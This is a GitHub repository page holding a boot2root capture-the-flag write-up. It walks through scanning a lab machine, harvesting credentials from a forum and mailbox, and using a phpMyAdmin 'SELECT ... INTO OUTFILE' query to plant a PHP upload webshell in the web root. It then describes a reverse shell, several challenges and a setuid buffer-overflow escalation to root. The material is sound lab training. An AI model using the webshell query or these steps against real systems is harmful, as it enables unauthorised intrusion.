https://github.com/f0rkr/boot2root

https://github.com/f0rkr/boot2root

Last synced: 9 months ago
JSON representation

• Host: GitHub
• URL: https://github.com/f0rkr/boot2root
• Owner: f0rkr
• Created: 2023-03-09T14:17:02.000Z (almost 3 years ago)
• Default Branch: master
• Last Pushed: 2023-03-30T02:27:33.000Z (almost 3 years ago)
• Last Synced: 2025-01-27T23:14:28.685Z (11 months ago)
• Language: PHP
• Size: 8.79 KB
• Stars: 1
• Watchers: 1
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          


# boot2root writeup

After running the machine and configuring the networking to bridged with en0 interface, we ran a ping sweep to find the ip address.

```

$ bash misc/psweep.sh

64 bytes from 10.12.176.109: icmp_seq=0 ttl=64 time=2.276 ms

64 bytes from 10.12.176.125: icmp_seq=0 ttl=64 time=0.555 ms

64 bytes from 10.12.176.141: icmp_seq=0 ttl=64 time=0.955 ms

```

Running an nmap scan on the machine results in multiple open ports

```

PORT    STATE SERVICE

21/tcp  open  ftp

22/tcp  open  ssh

80/tcp  open  http

143/tcp open  imap

443/tcp open  https

993/tcp open  imaps

```

Inspecting https we find two interesting routes /phpmyadmin and /forum, while browsing in the forum we find an interesting blog about troubleshooting sshd, and the blog author shared the error logs.

We find a valid password for user lmezard in the forum.

These credentials are only working on the imapd dovecot server, after logging in the the mailbox of laurie@borntosec.net we find root credentials to phpmyadmin,

giving us access to /phpmyadmin.

`openssl s_client -connect ip:993

a LOGIN user password

a LIST "" "*"

a SELECT INBOX.Sent

a FETCH 2 BODY.PEEK[]

`

With the help of phpmyadmin we can upload a php webshell that gives us arbitrary command execution.

`SELECT 

"\';echo \'\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'Upload Done.

\'; }else { echo \'Upload Failed.

\'; }}?>"

INTO OUTFILE '/var/www/forum/templates_c/upload.php';`


then we can upload a reverse shell you can find it in scripts

We run a listener, and execute a reverse shell payload through our webshell this is how we get a shell with user www-data.

We find a LOOKATME containing the credentials of user lmezard, we switch user with command su to lmezard, in it's home directory we find `fun` challenge.

We get our first challenge named `fun` solving it will give us ssh password of user laurie.

After solving the fun challenge we log in through ssh with laurie, and find another challenge a binary named bomb containing six phases that require a password to not explode, this challenge will give us access to user thor.

Thor contains a turtle graphics challenge, giving us a large file containing turtle commands for drawing the password, the password of user zaz

Finally zaz contains a set-uid binary with the owner root, the binary is vulnerable to a stack buffer overflow, we will inject shellcode that execute a shell and we get a root shell.